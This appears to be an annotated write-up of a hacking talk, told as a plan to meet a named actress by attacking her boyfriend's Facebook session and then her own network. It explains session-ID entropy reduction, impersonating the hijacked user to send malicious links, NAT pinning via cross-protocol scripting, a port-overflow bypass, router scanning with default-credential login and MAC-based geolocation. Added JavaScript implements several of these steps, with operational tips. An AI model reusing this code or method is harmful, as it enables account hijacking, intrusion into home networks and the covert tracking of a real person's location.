How I Met Your Girlfriend
A “hypothetical” story about how to meet a particular hot chick, Anna Faris, using hacker techniques. Her boyfriend, ‘rsnake’, is a security expert. They are connected on Facebook, and samy (the speaker) is connected to rsnake on Facebook.
Facebook uses PHP; for the story, assume it uses PHP’s default cookie-based session management (in reality it does not).
At first blush, it looks like the session cookie contains 160 bits of entropy:
- Client IP address (32 bits), epoch (32 bits), microseconds (32 bits), ‘random’ lcg_value (64 bits)
Reducing session entropy
- microseconds
  - Only 10^6 < 2^20 microsecond values are possible, so just 20 of the 32 bits matter (-12 bits)
- epoch time
  - The Facebook page sends AJAX requests to see who is online for chat, and the response includes the server time. Poll once per second for rsnake’s availability to pin the epoch second of his login down to within 1 second (-32 bits)
- client IP address
  - Send rsnake a link to a personal site that contains nothing fishy and log his IP address from the web server logs (-32 bits)
- lcg_value
  - The default PHP PRNG (lcg_value) is seeded from the PID and the time the webserver started.
  - The webserver start time, if known within 12 days (about 2^20 seconds), has its top 12 bits fixed (-12 bits). You can also try to force a restart by sending the server a lot of requests.
  - The PID is padded to 32 bits but is only 15 bits long (-17 bits). Moreover, if you can get the PID by any means, you can remove the other 15 bits of entropy the PID contributes (-15 bits)
Down to 40 bits of entropy. By guessing the microseconds first, that guess can be reused, so only 21 bits have to be guessed overall.
Note: PHP 5.3.2 patched these problems. Facebook uses its own PHP stack that was never vulnerable to this technique.
With the session ID recovered, samy can now log in as rsnake.
As rsnake, send Anna a link to a page on his site carrying malicious JavaScript.
Her NAT acts as a de facto firewall: inbound traffic to a port with no existing mapping is dropped.
Cross-Protocol Scripting (XPS)
- An HTTP server can run on any port, so the browser will send an HTTP request to whatever port the URL names.
- HTTP, IRC and SMTP are all newline-delimited protocols.
- Use JavaScript on his malicious page to send IRC messages over HTTP (e.g. a hidden form POST whose body carries the IRC commands) to an IRC server of his choosing.
- The IRC server ignores the HTTP headers it can’t interpret, but reacts to the embedded IRC commands.
- IRC Direct Client Connection (DCC) is how files get sent over IRC.
- When her NAT sees a DCC request go out, it opens the advertised port and forwards it straight to her machine.
- sidenote: browsers block HTTP traffic to some non-standard ports, but the check only tests equality against valid port numbers. samy wants to send traffic to port 6667, so he overflows the port: 6667 + 65536 = 72203 passes the check and the socket still ends up on 6667.
- Now traffic from samy to that port is forwarded straight to her machine (NAT Pinning).
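The whole XPS / NAT pinning chain above, as an added example written for this page (not the talk’s code): the bytes a hidden-form POST puts on the wire, a minimal model of how a line-oriented IRC server reads them, a DCC-aware NAT’s reaction, and the port-check overflow beside a fixed check. The IRC server and NAT are simplified models; the hostname, addresses, ports and blocklist contents are made up.

```javascript
// Added example (not from the talk): XPS request construction, an IRC server
// model, a DCC-aware NAT model and the port-check overflow. All hosts, ports
// and the blocklist below are constructed for illustration.

// 1. Cross-protocol request. multipart/form-data carries the textarea value
//    byte-for-byte, so CRLF-separated IRC commands reach the server intact.
function buildXpsRequest(host, urlPort, ircLines) {
  const boundary = '----FormBoundary7MA4YWxkTrZu0gW';   // fixed for reproducibility
  const body = [
    `--${boundary}`,
    'Content-Disposition: form-data; name="msg"',
    '',
    ...ircLines,
    `--${boundary}--`,
    '',
  ].join('\r\n');
  return [
    'POST / HTTP/1.1',
    `Host: ${host}:${urlPort}`,
    `Content-Type: multipart/form-data; boundary=${boundary}`,
    `Content-Length: ${Buffer.byteLength(body)}`,
    '',
    body,
  ].join('\r\n');
}

// 2. IRC server model: every CRLF-delimited line is a command. The request
//    line, the HTTP headers and the multipart boundaries are unknown commands
//    and draw a 421 reply; the embedded IRC lines are processed normally.
//    (Registration-state checks and prefix syntax are omitted.)
const KNOWN_COMMANDS = new Set(['NICK', 'USER', 'PRIVMSG', 'JOIN', 'QUIT']);

function ircServerConsume(raw) {
  const replies = [];
  const accepted = [];
  for (const line of raw.split('\r\n')) {
    if (line === '') continue;                        // blank line ending the headers
    const cmd = line.split(' ')[0].toUpperCase();
    if (!KNOWN_COMMANDS.has(cmd)) {
      replies.push(`421 ${cmd} :Unknown command`);
      continue;
    }
    accepted.push(line);
  }
  return { replies, accepted };
}

// 3. DCC-aware NAT (application-layer gateway): watches outbound IRC for a CTCP
//    DCC CHAT/SEND offer and pre-opens the advertised port towards the internal
//    host that sent it. The IP in a DCC offer is the address as a decimal integer.
function natAlgInspect(acceptedLines, internalHost) {
  const rules = [];
  for (const line of acceptedLines) {
    const m = /^PRIVMSG \S+ :\x01DCC (CHAT|SEND) \S+ (\d+) (\d+)/.exec(line);
    if (m) rules.push({ kind: m[1], externalPort: Number(m[3]), forwardTo: `${internalHost}:${m[3]}` });
  }
  return rules;
}

// 4. Port check as the notes describe it: equality against a blocklist on the
//    parsed integer, while the socket layer uses only the low 16 bits.
const BLOCKED_PORTS = new Set([25, 110, 119, 143, 6667]);     // illustrative list
function portCheckPasses(urlPort) { return !BLOCKED_PORTS.has(urlPort); }
function socketPort(urlPort) { return urlPort & 0xffff; }
// The fix: validate the range first, so the value checked is the value used.
function portCheckPassesFixed(urlPort) {
  return Number.isInteger(urlPort) && urlPort > 0 && urlPort <= 65535 && !BLOCKED_PORTS.has(urlPort);
}

// Constructed run: Anna (192.168.1.23, behind her NAT) loads rsnake's page,
// which posts to samy's IRC server using the overflowed port.
function demoNatPinning() {
  const urlPort = 6667 + 65536;
  const ircLines = [
    'NICK anna_', 'USER anna 0 * :anna',
    'PRIVMSG samy :\x01DCC CHAT chat 3232235799 8080\x01',   // 3232235799 = 192.168.1.23
  ];
  const raw = buildXpsRequest('irc.example.invalid', urlPort, ircLines);
  const server = ircServerConsume(raw);
  const natRules = natAlgInspect(server.accepted, '192.168.1.23');
  return { urlPort, wirePort: socketPort(urlPort), blockedNaive: !portCheckPasses(urlPort),
           blockedFixed: !portCheckPassesFixed(urlPort), server, natRules };
}
```

Two caveats a practitioner would check before relying on this: many ircds drop a connection whose first line looks like an HTTP request line, and DCC inspection in the NAT (the “application-layer gateway”) is vendor-specific, so the forwarding behaviour has to be confirmed per device.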
Send Anna, as rsnake, a message linking to a second malicious webpage.
XXXSS
- Scans her local network to determine her router type:
  - iframes on that page try the known admin pages on the usual internal router IPs.
- Logs into the router with default credentials, if necessary.
- Loads remote JavaScript that reads the MAC address from the router.
- Uses the request format from the Firefox source code and her router’s MAC address to query Google Location Services, which returns her latitude/longitude.
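The router discovery and geolocation steps above as plain functions, an added example that is not the talk’s code. In the browser the probe results would come from iframe/img onload and onerror handlers racing a timer; here they are passed in so the logic runs in Node. The gateway addresses, fingerprint paths, vendor names and the router page HTML are made up, and the request body shape is my recollection of what Firefox 3.x sent to Google’s location service (an assumption to check against the Firefox source the notes mention).

```javascript
// Added example (not from the talk): internal router discovery, MAC
// extraction and the location-service request. Gateways, paths, vendors and
// the sample HTML are constructed; the request shape is an assumption.

// Per-vendor fingerprints: a page path that exists on that firmware and
// nowhere else, tried on each common default gateway address.
const GATEWAYS = ['192.168.0.1', '192.168.1.1', '192.168.1.254', '10.0.0.1'];
const FINGERPRINTS = [
  { vendor: 'VendorA (hypothetical)', path: '/status.htm' },
  { vendor: 'VendorB (hypothetical)', path: '/cgi-bin/home' },
];

// Every URL the page would load, in the order it tries them.
function scanPlan(gateways = GATEWAYS, fingerprints = FINGERPRINTS) {
  const plan = [];
  for (const gateway of gateways) {
    for (const fp of fingerprints) {
      plan.push({ url: `http://${gateway}${fp.path}`, gateway, vendor: fp.vendor });
    }
  }
  return plan;
}

// probeResults maps url -> true if the iframe/img fired onload (page exists).
// The first candidate that loaded identifies both the gateway and the vendor.
function identifyRouter(probeResults, plan = scanPlan()) {
  for (const candidate of plan) {
    if (probeResults[candidate.url] === true) return candidate;
  }
  return null;
}

// Pull a MAC out of the router's status page, accepting ':' or '-' as the
// separator (consistently, via the backreference), and normalise to the
// dashed lower-case form used in the location request.
const MAC_RE = /\b([0-9A-Fa-f]{2})([:-])([0-9A-Fa-f]{2})\2([0-9A-Fa-f]{2})\2([0-9A-Fa-f]{2})\2([0-9A-Fa-f]{2})\2([0-9A-Fa-f]{2})\b/;

function extractMac(html) {
  const m = MAC_RE.exec(html);
  if (!m) return null;
  return [m[1], m[3], m[4], m[5], m[6], m[7]].join('-').toLowerCase();
}

// Request body for the lookup: one access-point entry carrying the router's
// MAC. signal_strength is filler; with a single entry its value is irrelevant.
function buildLocationRequest(mac) {
  return JSON.stringify({
    version: '1.1.0',                 // assumed shape, see lead-in
    request_address: false,
    wifi_towers: [{ mac_address: mac, signal_strength: -50 }],
  });
}

// Constructed run: only the VendorA status page on 192.168.1.1 "loaded", and
// its HTML shows the LAN MAC in colon notation.
const SAMPLE_PROBES = { 'http://192.168.1.1/status.htm': true };
const SAMPLE_STATUS_HTML = '<tr><td>LAN MAC Address</td><td>00:1A:2B:3C:4D:5E</td></tr>';

function demoRouterLocate() {
  const router = identifyRouter(SAMPLE_PROBES);
  const mac = extractMac(SAMPLE_STATUS_HTML);
  return { router, mac, request: mac ? buildLocationRequest(mac) : null };
}
```

In a real page the scan is the slow part: each probe is a cross-origin load whose only observable outcome is onload versus onerror/timeout, so the fingerprint list should be ordered by how common each gateway and firmware is, and the timeout kept short.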